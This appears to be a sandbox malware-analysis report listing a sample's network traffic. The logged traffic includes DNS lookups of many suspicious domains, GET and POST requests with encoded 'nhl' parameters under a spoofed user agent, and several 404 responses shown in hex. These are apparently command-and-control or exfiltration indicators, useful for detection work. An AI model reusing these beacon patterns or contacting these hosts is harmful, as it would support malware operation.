          Source: global trafficHTTP traffic detected: GET /77wx/?nhl=7ua6JbFlh1WLJoaoNlAsRfuIF2sTJF6LcTXb+zyHp2SVRtSd1ym3pm1J8yCDVb0000UvVw5gSTI/Vgi/faUhMgUdHvrcPrlqAqbrORdxYiGJRn981ClOzM4=&9X=EvKH2xeP-DpP307P HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.teerra.shopConnection: closeUser-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
          Source: global trafficHTTP traffic detected: GET /51t8/?nhl=m7B14gWZ3tTp+Si7ZmYNMzAQVPiIRhKeZLAtkzFkwSvyWpqHTy62LwfcTz9vRoaiRTwb/KbEqTho7SSr6qx+JXj6A7Si0P86LNCZt8nEBft2KH0FBAqzAzY=&9X=EvKH2xeP-DpP307P HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.agilizeimob.appConnection: closeUser-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
          Source: global trafficHTTP traffic detected: GET /a54a/?9X=EvKH2xeP-DpP307P&nhl=o4K6tsf3571BBp7MmhSZOYJB40PnENiiTojsdIYY6SFl2KjLaqenA37xSw6A2T1U0IJTLvgGXRIo0JyFUWzQew80cVlMmXXQBLtF+x/K+99dL6NKNKQQtqY= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.sealofsea.xyzConnection: closeUser-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
          Source: global trafficDNS traffic detected: DNS query: www.sealofsea.xyz
          Source: global trafficDNS traffic detected: DNS query: www.firstcry.shop
          Source: global trafficDNS traffic detected: DNS query: www.languyenthuyduyen.xyz
          Source: global trafficDNS traffic detected: DNS query: www.bayarcepat19.click
          Source: global trafficDNS traffic detected: DNS query: www.030002304.xyz
          Source: global trafficDNS traffic detected: DNS query: www.doggieradio.net
          Source: global trafficDNS traffic detected: DNS query: www.mybartendinglife.club
          Source: global trafficDNS traffic detected: DNS query: www.ntn.solar
          Source: global trafficDNS traffic detected: DNS query: www.technew.shop
          Source: global trafficDNS traffic detected: DNS query: www.allpop.xyz
          Source: global trafficDNS traffic detected: DNS query: www.zingara.life
          Source: global trafficDNS traffic detected: DNS query: www.thepeatear.online
          Source: global trafficDNS traffic detected: DNS query: www.kx507981.shop
          Source: global trafficDNS traffic detected: DNS query: www.teerra.shop
          Source: global trafficDNS traffic detected: DNS query: www.asociacia.online
          Source: global trafficDNS traffic detected: DNS query: www.agilizeimob.app
          Source: unknownHTTP traffic detected: POST /2mvq/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.firstcry.shopCache-Control: max-age=0Content-Length: 200Content-Type: application/x-www-form-urlencodedConnection: closeOrigin: http://www.firstcry.shopReferer: http://www.firstcry.shop/2mvq/User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1Data Raw: 6e 68 6c 3d 34 64 65 76 49 71 58 43 6f 41 35 7a 30 4d 4e 34 48 77 55 43 71 6f 4e 79 51 36 70 2f 4c 54 64 6c 71 73 4d 77 56 44 68 7a 57 5a 52 7a 38 30 36 5a 6b 78 35 33 65 75 6e 4d 6c 38 2f 4b 4d 58 59 73 49 63 38 53 38 77 35 42 76 52 6b 38 64 50 45 4b 78 34 30 77 30 41 45 42 49 4e 59 4d 57 38 71 6b 4d 51 4d 6c 74 53 34 75 30 73 59 77 4b 79 41 6b 70 4d 6b 37 6e 78 66 6c 63 59 6a 6d 35 36 44 76 69 69 32 43 4d 4a 58 68 71 4b 6a 2f 7a 78 74 72 66 5a 6b 72 73 2f 6a 66 76 67 71 4f 50 39 37 74 67 4e 51 77 68 59 32 37 43 65 63 72 46 73 78 39 4d 32 47 6b 4a 45 36 74 36 48 33 75 6d 61 4d 4e 7a 77 3d 3d Data Ascii: nhl=4devIqXCoA5z0MN4HwUCqoNyQ6p/LTdlqsMwVDhzWZRz806Zkx53eunMl8/KMXYsIc8S8w5BvRk8dPEKx40w0AEBINYMW8qkMQMltS4u0sYwKyAkpMk7nxflcYjm56Dvii2CMJXhqKj/zxtrfZkrs/jfvgqOP97tgNQwhY27CecrFsx9M2GkJE6t6H3umaMNzw==
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 09 Oct 2024 11:03:28 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 09 Oct 2024 11:03:31 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 09 Oct 2024 11:03:34 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 09 Oct 2024 11:03:36 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:04:23 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:04:25 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:04:28 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:04:31 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
